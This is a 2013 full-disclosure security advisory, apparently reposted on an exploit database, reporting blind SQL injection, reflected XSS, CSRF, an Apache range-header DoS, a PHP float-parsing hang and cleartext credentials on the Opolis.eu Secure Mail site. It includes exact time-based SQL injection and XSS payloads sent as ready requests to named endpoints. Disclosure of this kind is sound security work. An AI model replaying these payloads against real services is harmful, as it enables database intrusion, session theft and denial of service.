Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS

2013.10.08
Risk: Medium
Local: No
Remote: Yes


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

========================================================================================================================================================================= OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text ========================================================================================================================================================================== TIME-LINE VULNERABILITY Multiples Advisories Opolis Secure IT-Services GmbH Address:Romberggasse 3 1230 Vienna Austria E-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu> BUT Not Response THEN Full Disclosure I. VULNERABILITY ------------------------- #Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text #Vendor:http://www.opolis.eu/ #Author:Juan Carlos Garca (@secnight) #Follow me Twitter:@secnight II. DESCRIPTION ------------------------- Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service. Opolis re-defines E-Mail with its ?Power to the Sender? philosophy: The sender decides if or how E-Mails may be further processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL. III. PROOF OF CONCEPT ------------------------- Blind SQL Injection ******************** Vulnerability description ------------------------- SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. Affected items ---------------- /createOpolisWorkGroup/createOpolisWorkGroupStep5.php URL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect %20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc /slimstat/stats_js.php "ttl" URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK (2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/ GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version %2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version %2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% "url" URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK (2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/ GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR %28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR %28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f Cross site scripting ( 67 ) ********************* Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Affected items ---------------- /createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2) URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304 POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304 /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2) URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560 POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl /OpolisSignUp/OpolisSignUpStep1a.php (2) URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637 POST /OpolisSignUp/OpolisSignUpStep1a.php checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637 /OpolisSignUp/OpolisSignUpStep2a.php URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211 The input is reflected inside <script> tag between double quotes. POST /OpolisSignUp/OpolisSignUpStep2a.php currentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh /createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3) URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(939864) bad=" POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php checkedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield= /createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5) URL encoded POST input checkedemail was set to 1" onmouseover=prompt(911118) bad=" POST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php checkedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield POST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5) URL encoded POST input checkedemail was set to 1" onmouseover=prompt(967963) bad=" checkedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst /createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52) URL encoded POST input aicountry was set to Antarctica'"()&%<ScRiPt >prompt(973546)</ScRiPt> aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt %3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp /OpolisSignUp/OpolisSignUpStep2a.php. (3) URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad=" checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield= /OpolisSignUp/OpolisSignUpStep3a.php. (5) URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad=" checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield= Cross Site Request Forgery CSRF (12) ******************************* Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Affected items --------------- /createOpolisWorkGroup/createOpolisWorkGroupStep1.php /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) /createOpolisWorkGroup/createOpolisWorkGroupStep3.php /createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) /OpolisSignUp/OpolisSignUpStep1a.php /OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) /OpolisSignUp/OpolisSignUpStep3a.php /slimstat (9200b13decfada22b75676834e865e65) The impact of this vulnerability --------------------------------- An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. Two examples ( too much security flaws .. ) /createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2) Attack details ---------------- Form name: OSMSignUp Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php Form method: POST Form inputs: checkloginname [Hidden] OSMLogInNam [Text] /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). Attack details ----------------- Form name: OSMSignUp Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php Form method: POST Form inputs: showcheckedloginname [Text] currentEmail [Text] POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php checkedloginname=&showEmailfield= Apache httpd Remote D.O.S (2) ************************** Vulnerability description ------------------------------- A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: http://seclists.org/fulldisclosure/2011/Aug/175 An attack tool is circulating in the wild. Active use of this tools has been observed. The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). How to fix this vulnerability ---------------------------- Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. Web references -------------- CVE-2011-3192 Apache HTTPD Security ADVISORY Apache HTTP Server 2.2.20 Released Apache httpd Remote Denial of Service (memory exhaustion) Apache httpOnly cookie disclosure ********************************** Vulnerability description ---------------------------- Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. Affected Apache versions (up to 2.0.21). The impact of this vulnerability ------------------------------- Information disclosure. How to fix this vulnerability ------------------------------ Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue. Web references --------------- Fixed in Apache httpd 2.2.22 Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability PHP hangs on parsing particular strings as floating point number (2) ***************************************************************** PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number. Current version is : PHP/5.3.1 Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17 Affected items --------------- Web Server The impact of this vulnerability ---------------------------------- Denial of service attack How to fix this vulnerability ------------------------------- Upgrade PHP to the latest version. Web references ----------------- PHP Hangs On Numeric Value 2.2250738585072011e-308 PHP Homepage User credentials are sent in clear text ***************************************** Vulnerability description --------------------------- User credentials are transmitted over an unencrypted channel. This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. Affected items -------------- /slimstat (9200b13decfada22b75676834e865e65) The impact of this vulnerability ---------------------------------- A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. How to fix this vulnerability ------------------------------- Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). IV. BUSINESS IMPACT ------------------------- ( No Comments... ) V SOLUTION ------------------------ Very easy and I dont understand... WRITE SECURE CODE P L E A S E !! VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos Garca(@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top